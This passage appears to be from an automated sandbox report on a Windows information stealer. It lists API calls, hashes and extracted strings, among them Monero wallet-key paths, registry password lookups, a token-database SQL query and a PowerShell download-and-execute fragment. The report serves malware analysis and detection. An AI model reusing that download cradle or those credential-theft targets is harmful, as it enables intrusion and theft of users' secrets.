                               • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 3065412caca77ceb333250018ffe5c1a49ccf184065412bb586bb3c98439b19b
                              • Instruction ID: 4c19b21889bec208947a71dd66075f29b4c7e67c5e2b8cf12ef41107683ade93
                              • Opcode Fuzzy Hash: 3065412caca77ceb333250018ffe5c1a49ccf184065412bb586bb3c98439b19b
                              • Instruction Fuzzy Hash: FB5165B1E5021997DB16FB60DD95FED737CAF64200F4041A8A68AA30D0EF345B89CFA5
                              APIs
                                • Part of subcall function 00FF72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FF733A
                                • Part of subcall function 00FF72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FF73B1
                                • Part of subcall function 00FF72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FF740D
                                • Part of subcall function 00FF72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00FF7452
                                • Part of subcall function 00FF72D0: HeapFree.KERNEL32(00000000), ref: 00FF7459
                              • lstrcat.KERNEL32(00000000,010117FC), ref: 00FF7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FF7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00FF765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FF768F
                              • lstrcat.KERNEL32(00000000,01011804), ref: 00FF76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FF76D3
                              • lstrcat.KERNEL32(00000000,01011808), ref: 00FF76ED
                              • task.LIBCPMTD ref: 00FF76FB
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 5834e8f8c70c3e0fda8b24c575ae218e6b52011f23b6a804b0ea5ea0dc4d39df
                              • Instruction ID: b8fabeda6af6d333334e0970e59b228fb7aec0fe417d932e67f8331795131cf3
                              • Opcode Fuzzy Hash: 5834e8f8c70c3e0fda8b24c575ae218e6b52011f23b6a804b0ea5ea0dc4d39df
                              • Instruction Fuzzy Hash: E531EC72900209DFCF18EBB4EC99DFE7779AF54301B104128E242E72A4DA39A946EB50
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0198F6E8,00000000,?,01010E2C,00000000,?,00000000), ref: 01008130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01008137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 01008158
                              • __aulldiv.LIBCMT ref: 01008172
                              • __aulldiv.LIBCMT ref: 01008180
                              • wsprintfA.USER32 ref: 010081AC
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: 8f5bbd7b9fb6d30d794768d2f82d77b82b6c28537cf5144f5a90b4b1e52c07a2
                              • Instruction ID: edf53c772a5b2550dd36049843d98dbc57557bf3e758c6d538d4cde05d235e45
                              • Opcode Fuzzy Hash: 8f5bbd7b9fb6d30d794768d2f82d77b82b6c28537cf5144f5a90b4b1e52c07a2
                              • Instruction Fuzzy Hash: 1F214AB1E44208ABEB10DFD4DC49FAEBBB8FB44B10F104219F645BB2C4C77869008BA5
                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FF4839
                                • Part of subcall function 00FF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FF4849
                              • InternetOpenA.WININET(01010DF7,00000001,00000000,00000000,00000000), ref: 00FF610F
                              • StrCmpCA.SHLWAPI(?,0198FB08), ref: 00FF6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00FF618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FF61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00FF61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FF620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00FF6249
                              • InternetCloseHandle.WININET(?), ref: 00FF6253
                              • InternetCloseHandle.WININET(00000000), ref: 00FF6260
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: fb369467f215555f6855833390ee37f542d2f61c572a1d9349db627fe55d594c
                              • Instruction ID: 567d7990e69be3b0f8780f624c4b45046cce138f2fd593d5c15b0ecd1d2d7a4e
                              • Opcode Fuzzy Hash: fb369467f215555f6855833390ee37f542d2f61c572a1d9349db627fe55d594c
                              • Instruction Fuzzy Hash: 84514CB1A00218ABEF24DB50DC49BEE77B8EF44705F1080A8A646E71C4DB746A89DF94
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FF733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FF73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FF740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00FF7452
                              • HeapFree.KERNEL32(00000000), ref: 00FF7459
                              • task.LIBCPMTD ref: 00FF7555
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 7904713cdfb2b33bf8b0ef49feeebec1b0be5d99e7b650212932d70f2b7dbfd3
                              • Instruction ID: bbd3b5fba8843f8396415d43c34b9627c39003ed8ef6b7c59b31570395dd9d04
                              • Opcode Fuzzy Hash: 7904713cdfb2b33bf8b0ef49feeebec1b0be5d99e7b650212932d70f2b7dbfd3
                              • Instruction Fuzzy Hash: 5F614AB1C0422C9BDB24DB50DC85BEAB7B8BF44300F0081E9E689A6155DFB45BC9DFA0
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                              • lstrlen.KERNEL32(00000000), ref: 00FFBC9F
                                • Part of subcall function 01008E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01008E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00FFBCCD
                              • lstrlen.KERNEL32(00000000), ref: 00FFBDA5
                              • lstrlen.KERNEL32(00000000), ref: 00FFBDB9
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 387507b44bf6b733fae74ed5eb54ec93b9e05f3616ff5937bae6597d95f9dbfd
                              • Instruction ID: f4eeb946e5e4fa5610864e2e1d1c07fe88225202b3e7effc3162a023b212ece7
                              • Opcode Fuzzy Hash: 387507b44bf6b733fae74ed5eb54ec93b9e05f3616ff5937bae6597d95f9dbfd
                              • Instruction Fuzzy Hash: 41B12071A10209DBEF19FBA0DD95EEE7338AF64200F404169E587A71D4EF346B49CBA1
                              APIs
                              Strings
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 7ac94bac53d01c688e2017e427850d36c7d1915662c4dba8f6b01d9bc31d27c4
                              • Instruction ID: 4298eb0d20691d9d0ba766b3faa7765e293050cfd16054e2b3be344ed49e413e
                              • Opcode Fuzzy Hash: 7ac94bac53d01c688e2017e427850d36c7d1915662c4dba8f6b01d9bc31d27c4
                              • Instruction Fuzzy Hash: 5CF05E30904309EFD3699FE0F54D76C7B70FB04703F0401A8E68AC7284E6754B519B95
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FF4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FF4FD1
                              • InternetOpenA.WININET(01010DDF,00000000,00000000,00000000,00000000), ref: 00FF4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00FF5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00FF5041
                              • InternetCloseHandle.WININET(?), ref: 00FF50B9
                              • InternetCloseHandle.WININET(?), ref: 00FF50C6
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: f2b3101b10cdde3cc0ae18f623b4822bd254e489cb2ed458aeae13a8e302acba
                              • Instruction ID: 468b4ee12724d5d22e37ccfdfa37e6688085c8df8a4c0ba4e33b2148359a7c2c
                              • Opcode Fuzzy Hash: f2b3101b10cdde3cc0ae18f623b4822bd254e489cb2ed458aeae13a8e302acba
                              • Instruction Fuzzy Hash: 1C31F9B5A4021CABDB24CF54DC89BDCB7B4EB48704F5081E9E709A7284CB706EC59F98
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 01008426
                              • wsprintfA.USER32 ref: 01008459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0100847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0100848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 01008499
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0198F718,00000000,000F003F,?,00000400), ref: 010084EC
                              • lstrlen.KERNEL32(?), ref: 01008501
                              • RegQueryValueExA.ADVAPI32(00000000,0198F700,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,01010B34), ref: 01008599
                              • RegCloseKey.ADVAPI32(00000000), ref: 01008608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0100861A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: e441679ccbfcdf54b2c08c9eafcff5e0371b3efd0125a1bf3969f03f0857d80f
                              • Instruction ID: 5a2a0d8cf624b58e3916b473f6e6871f198854a4adaedb5e4f732de3c0c507a0
                              • Opcode Fuzzy Hash: e441679ccbfcdf54b2c08c9eafcff5e0371b3efd0125a1bf3969f03f0857d80f
                              • Instruction Fuzzy Hash: 05210A71A102189BEB64DB54DC84FE9B3B8FB48700F00C5E9A649A7280DF716A85CFD4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 010076A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 010076AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0197BAB0,00000000,00020119,00000000), ref: 010076DD
                              • RegQueryValueExA.ADVAPI32(00000000,0198F730,00000000,00000000,?,000000FF), ref: 010076FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 01007708
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: c4697080fa8afc87dd1e802cdfeb47c80ef2fb8fc63cdf6df6118d079d176713
                              • Instruction ID: 9422f9ff86771607a50d68dc9e78a26e5c05369905961f7145a8417f863d8390
                              • Opcode Fuzzy Hash: c4697080fa8afc87dd1e802cdfeb47c80ef2fb8fc63cdf6df6118d079d176713
                              • Instruction Fuzzy Hash: 1F014FB5A00208BBE711DBE4EC4DFADB7B8EB48701F0040A8FB85D72C4D674A9048B50
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01007734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0100773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0197BAB0,00000000,00020119,010076B9), ref: 0100775B
                              • RegQueryValueExA.ADVAPI32(010076B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0100777A
                              • RegCloseKey.ADVAPI32(010076B9), ref: 01007784
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 006a5fd4a4e48b0fff71151b28b2eb9399afcc3df677d91a4205d43e850d35b6
                              • Instruction ID: 9c2f1ceb2be14d52e05f7e1d88931ac7edfa4ce094b066dedb090f90778df5d9
                              • Opcode Fuzzy Hash: 006a5fd4a4e48b0fff71151b28b2eb9399afcc3df677d91a4205d43e850d35b6
                              • Instruction Fuzzy Hash: 810167B5A40308BBE710DBE4EC4DFAEB7B8FB48700F004159FA45E7285D6745500CB51
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FF9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00FF9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00FF148F,00000000), ref: 00FF9A5A
                              • LocalFree.KERNEL32(00FF148F), ref: 00FF9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00FF9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 5387ae745010a2fcc55516c6200f1032a0b75d5e28a66e2ba0a8d2afa8164428
                              • Instruction ID: d0803c5f1202ec73f86bee49c2a8025725623b556adef414c12d3b8603394de6
                              • Opcode Fuzzy Hash: 5387ae745010a2fcc55516c6200f1032a0b75d5e28a66e2ba0a8d2afa8164428
                              • Instruction Fuzzy Hash: 8131E9B4E0020DEFDB24CF94D989BAE77B5FF48350F108158E912A7294D778AA41DFA1
                              APIs
                              • lstrcat.KERNEL32(?,0198F280), ref: 010047DB
                                • Part of subcall function 01008DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01008E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 01004801
                              • lstrcat.KERNEL32(?,?), ref: 01004820
                              • lstrcat.KERNEL32(?,?), ref: 01004834
                              • lstrcat.KERNEL32(?,0197A890), ref: 01004847
                              • lstrcat.KERNEL32(?,?), ref: 0100485B
                              • lstrcat.KERNEL32(?,0198E2F0), ref: 0100486F
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 01008D90: GetFileAttributesA.KERNEL32(00000000,?,00FF1B54,?,?,0101564C,?,?,01010E1F), ref: 01008D9F
                                • Part of subcall function 01004570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 01004580
                                • Part of subcall function 01004570: RtlAllocateHeap.NTDLL(00000000), ref: 01004587
                                • Part of subcall function 01004570: wsprintfA.USER32 ref: 010045A6
                                • Part of subcall function 01004570: FindFirstFileA.KERNEL32(?,?), ref: 010045BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 5624c974c383c2d31712abee821291d480a897e7a2cda56e029404eb505ed7c7
                              • Instruction ID: 030347999cd37539847f30052e62e7525b47f3ba6de0461af9bc21eca7708825
                              • Opcode Fuzzy Hash: 5624c974c383c2d31712abee821291d480a897e7a2cda56e029404eb505ed7c7
                              • Instruction Fuzzy Hash: 84317FB2D00218A7DB21FBB0DC88EE9737CBB68700F444599A39997080EA74D7898B95
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 01002D85
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 01002CC4
                              • ')", xrefs: 01002CB3
                              • <, xrefs: 01002D39
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 01002D04
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: c9a9c4155b502524fbc0b24a0830c408ccc7e41128f1e894f60e22a22e3fa666
                              • Instruction ID: 1d7bd9ff35c14b460f104a9534dceecd83ce1562c3534c8a930a0fa3e7dd04cb
                              • Opcode Fuzzy Hash: c9a9c4155b502524fbc0b24a0830c408ccc7e41128f1e894f60e22a22e3fa666
                              • Instruction Fuzzy Hash: 0241BB71E10209DAEB16FBA1D894FDDBB74BF24300F404119E196AB1D4EF746A8ACF90
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00FF9F41
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 99027b8347121964df0b738efc0ec919e06e142acd803f8f7e70fe13d509ed0f
                              • Instruction ID: 14ed3f2d4a9ee333a7f452083565ebebbbbc5ba6ab5f5d3b47ad784d821f02cc
                              • Opcode Fuzzy Hash: 99027b8347121964df0b738efc0ec919e06e142acd803f8f7e70fe13d509ed0f
                              • Instruction Fuzzy Hash: 6F615B71A0020CEBDB24EFA4DC95FED7775BF54300F448118EA4A9F294EB746A0ACB91
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,0198E1D0,00000000,00020119,?), ref: 010040F4
                              • RegQueryValueExA.ADVAPI32(?,0198F2C8,00000000,00000000,00000000,000000FF), ref: 01004118
                              • RegCloseKey.ADVAPI32(?), ref: 01004122
                              • lstrcat.KERNEL32(?,00000000), ref: 01004147
                              • lstrcat.KERNEL32(?,0198F1A8), ref: 0100415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 0168c4cbbd2b598621f756826369015eb2595674d140aefb16c51c04429ad272
                              • Instruction ID: 400fc4070f039bd047150ac5e43d82d097f4e0ad7b8bdcf8bb9a531195f6069c
                              • Opcode Fuzzy Hash: 0168c4cbbd2b598621f756826369015eb2595674d140aefb16c51c04429ad272
                              • Instruction Fuzzy Hash: 5941DAB6D00108ABDB25EBA0EC4AFFE733DBB58300F444558A755971C4EA759A888B91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01007E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01007E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0197BD18,00000000,00020119,?), ref: 01007E5E
                              • RegQueryValueExA.ADVAPI32(?,0198E310,00000000,00000000,000000FF,000000FF), ref: 01007E7F
                              • RegCloseKey.ADVAPI32(?), ref: 01007E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: be147b651a0c8d8e0ae6e95019cea01fe44f0410b2ade58a8a9a055754b1bccd
                              • Instruction ID: 38fd17ae31c0f18bc1d8067f6d70a465f4777a0231e80e58d295f744af88db57
                              • Opcode Fuzzy Hash: be147b651a0c8d8e0ae6e95019cea01fe44f0410b2ade58a8a9a055754b1bccd
                              • Instruction Fuzzy Hash: A7114FB1A44205EBD715CB94E949F7FBBB8FB08B10F104129F685E7284D7786C008BA1
                              APIs
                              • StrStrA.SHLWAPI(0198F1F0,?,?,?,0100140C,?,0198F1F0,00000000), ref: 0100926C
                              • lstrcpyn.KERNEL32(0123AB88,0198F1F0,0198F1F0,?,0100140C,?,0198F1F0), ref: 01009290
                              • lstrlen.KERNEL32(?,?,0100140C,?,0198F1F0), ref: 010092A7
                              • wsprintfA.USER32 ref: 010092C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: d736083cc2929b8d3997a0fced9ad71d8de03c0faa37af066eb8e8430ec24c1b
                              • Instruction ID: 295e3cb78fbe6fdde7e77dcfea80766dc9e08f1324bbdd452ee14ad8fb1da00f
                              • Opcode Fuzzy Hash: d736083cc2929b8d3997a0fced9ad71d8de03c0faa37af066eb8e8430ec24c1b
                              • Instruction Fuzzy Hash: 97011E75500108FFCB08DFECD988EAE7BB9FB54354F108558F949CB205D631AA40DB90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FF12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FF12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FF12F5
                              • RegCloseKey.ADVAPI32(?), ref: 00FF12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 279702c5a869dfede165dd22f337ea83b3cfb66e8d34669176103ce21cac9227
                              • Instruction ID: baacaabbfe47eedd9115ecd053a5a2d9ce8f89a1dbcfaccaee25031b00960007
                              • Opcode Fuzzy Hash: 279702c5a869dfede165dd22f337ea83b3cfb66e8d34669176103ce21cac9227
